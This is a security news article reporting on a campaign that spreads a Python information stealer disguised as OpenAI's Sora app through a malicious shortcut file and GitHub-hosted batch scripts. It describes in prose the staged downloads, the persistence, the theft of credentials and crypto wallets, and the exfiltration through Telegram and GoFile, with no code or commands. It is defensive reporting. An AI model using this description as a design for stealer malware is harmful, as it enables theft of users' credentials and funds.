Cybercriminals exploit SoraAI Popularity & GitHub to Deliver Malware

Attackers have seized on the global fascination with OpenAI’s Sora, a cutting-edge video generation model, by distributing potent information-stealing malware under its guise.

This campaign exploits both the popularity of Sora and the credibility of open-source platforms like Github to propagate malware, thereby widening its potential victim pool.

Attack Chain Leverages Social Engineering

The attack begins with a malicious Windows shortcut file, “SoraAI.lnk,” which is crafted to mimic legitimate AI software.

Unsuspecting users, tricked via social engineering, execute this file, unknowingly initiating a sophisticated multi-stage infection process.

Unlike typical malware distribution that relies on shady download sites, this campaign leverages Github repositories a trusted platform within the developer community by hosting malicious payloads named after legitimate AI tools.

Upon execution, “SoraAI.lnk” triggers a series of scripts that utilize Windows command line and PowerShell to download additional payloads from a Github repository.

The malware chain commences by fetching a batch script (“a.bat”) into the victim’s temporary directory.

According to K7 Security Labs Report, this script persistently attempts to download a zipped archive containing further malicious components, extracting and executing each stage in a highly automated sequence.

The batch scripts are designed to suppress visible output and clean up after themselves, minimizing forensic traces and user suspicion.

Information-Stealing Malware

Subsequent stages deploy additional scripts (“f.bat” and “1.bat”) that repeat the download-extract-execute cycle, each time fetching new components, until the attacker’s Python-based information stealer is fully deployed.

The Python stealer harnesses legitimate libraries such as requests, websocket-client, pywin32, aiohttp, and cryptography to enhance HTTP communications, system integration, and encrypted data handling.

Critically, the stealer establishes persistence by creating autorun entries in system startup folders, ensuring that the infection survives reboots.

The malicious Python script systematically targets sensitive user data by scanning for browser profiles, extracting cookies, saved passwords, and autofill entries from Chrome, Firefox, and Opera browsers.

It also exports wifi credentials, cryptocurrency wallet data, and gaming launcher configurations potentially compromising both personal and financial assets.

Notably, the malware employs advanced tactics such as process enumeration, memory scraping, and the use of a custom Chrome decryption DLL to bypass browser security measures.

All harvested data is compressed into zip archives, labeled with victim-specific identifiers such as IP address and country, and exfiltrated via Telegram bot APIs an increasingly popular tactic for bypassing traditional network defenses.

For larger data sets exceeding 49 MB, files are covertly uploaded to external hosting services like GoFile.io, further complicating detection and response efforts.

This multi-stage, persistent threat exemplifies how cybercriminals efficiently combine social engineering, open-source infrastructure abuse, and modular stealer toolkits to maximize both infection rates and data theft.

First identified in Vietnam in May 2025, the campaign has rapidly expanded to other regions. The true scope of affected users remains unknown.

Security researchers urge users to download software exclusively from official, verified sources; scrutinize executable files before launching them; and maintain robust, updated endpoint protections.

As attacks increasingly exploit the blurred lines between legitimate AI innovation and cybercrime, heightened vigilance and layered defenses are essential.

Indicators of Compromise (IOC)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Update